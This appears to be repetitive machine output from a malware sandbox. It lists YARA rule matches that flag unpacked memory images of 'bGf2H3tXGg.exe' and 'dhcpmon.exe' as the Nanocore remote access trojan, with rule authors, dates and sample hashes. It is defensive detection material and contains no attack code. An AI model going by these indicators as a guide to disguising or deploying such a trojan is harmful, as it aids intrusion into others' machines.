        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.258cc88.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.258cc88.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.23fca20.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.23fca20.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.35e3214.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.35e3214.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.340c550.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.340c550.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.3470831.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.3470831.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.3513214.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.3513214.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.25cba7c.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.25cba7c.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.346c208.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.346c208.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.346c208.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.346c208.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.3513214.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.3513214.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.374a506.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.374a506.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
